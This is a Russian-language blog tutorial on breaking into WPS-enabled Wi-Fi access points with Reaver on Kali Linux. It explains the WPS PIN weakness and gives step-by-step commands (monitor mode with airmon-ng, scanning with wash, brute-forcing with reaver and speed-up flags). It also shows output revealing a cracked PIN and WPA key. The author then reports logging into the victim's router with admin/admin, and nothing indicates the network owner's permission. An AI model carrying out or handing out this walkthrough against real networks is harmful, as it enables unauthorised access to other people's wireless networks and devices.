Сегодня мы попробуем осуществить взлом WIFI WPS точки доступа.
Что такое WIFI WPS?
Wi-Fi Protected Setup (защищённая установка), WPS — это стандарт (а так же протокол) полуавтоматического подключения к беспроводной сети Wi-Fi. Этот протокол был придуман дл того, чтобы упростить подключение к беспроводной сети. В итоге он и правда упростил подключение к сети. Причем для всех. Для злоумышленника он тоже упростился. Потому что, хоть в коде WPS 8 знаков, но 8-й знак это контрольная сумма, а так же в протоколе есть уязвимость, которая позволяет проверять пин-код блоками, а не целеком. Первый блок 4 цифры и второй блок 3 цифры. итого получается 9999+999=10998 комбинаций.
Как взламывать другие типы шифрования я рассказывал в статьях:
подбор WEP ключей для Wi-Fi
Взлом Wi-Fi с шифрованием WPA/WPA2 PSK
А используемое оборудование в статье:
Оборудование для Вардрайвинга
Для подбора ключа используем дистрибьютив Linux Kali, который был создан для тестов на проникновения. Reaver и остальные утилиты в него уже встроены. Поэтому описывать, как их установить я не буду.
Для начала сделаем подготовительные шаги. Просканируем Wi-Fi диапазон на наличие точек с нужным типом авторизации.
Для этого переведем адаптер в режим мониторинга (будем считать, что Wi-Fi адаптер это wlan0):
airmon-ng start wlan0
В выводе команды мы увидим имя виртуального интерфейса в режиме мониторинга (обычно первый такой интерфейс это mon0).
Теперь просканируем окружающие сети:
wash -i mon0
Увидим список сетей, которые поддерживают WPS. В дальнейшем нам нужен будет BSSID сети из первой колонки.
Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 64:XX:XX:XX:XX:F4 1 -06 1.0 No BXXXXXXXXXXXXXXXXXXXXXXXr F8:XX:XX:XX:XX:3B 9 -70 1.0 No aXXXXXX4 60:XX:XX:XX:XX:B8 6 -73 1.0 No AXXXXK</cheffner>
И наконец перейдем непосредственно к самому перебору паролей:
reaver -i mon0 -vv -b 64:XX:XX:XX:XX:F4
Где:
-i mon0 это интерфейс.
-b 64:XX:XX:XX:XX:F4 это BSSID атакуемой точки.
-vv необязательный ключ, он включает подробный вывод, но я люблю смотреть что именно сейчас происходит.
[ad name=»Responbl»]
Так же есть дополнительные полезные ключи:
‐‐dh-small — задает небольшое значение секретного ключа, чем немного разгружает точку доступа и немного ускоряет брутфорс.
-t 2 — уменьшает время ожидания ответа (по умолчанию 5 секунд) в данном случае до 2 секунд.
-d 0 — пауза между попытками.
Запустится процесс перебора пин-кодов:
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com> [+] Waiting for beacon from 64:XX:XX:XX:XX:F4 [+] Switching mon1 to channel 1 [+] Associated with 64:XX:XX:XX:XX:F4 (ESSID: BXXXXXXXXXXXXXXXXXXXXXXXr) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 00005678</cheffner>
Рано или поздно мы увидим (я увидел примерно чере 6 часов) подобранный пин-код и ключ шифрования сети.
[+] WPS PIN: '762XXX99' [+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw' [+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr' [+] Nothing done, nothing to save. [+] WPS PIN: '762XXX99' [+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw' [+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr' [+] Nothing done, nothing to save.
И далее подключаемся к сети.
После подключения к сети, я попробовал зайти на маршрутизатор. Как это не странно, но логин/пароль: admin/admin подошел. Поэтому так же прилагаю скриншоты пин-кода и пароля Wi-Fi с самой точки доступа.
Взлом WIFI WPS Точки доступа успешен!
При написании статьи, использовались материалы сайта http://blackdiver.net/it/linux/3032
2 comments On Взлом WIFI WPS с помощью Reaver.
Pingback: Как создать поддельную точку доступа ROGUE AP - Cryptoworld ()
Pingback: Взлом WIFI сетей - советы профессионалов. - Cryptoworld ()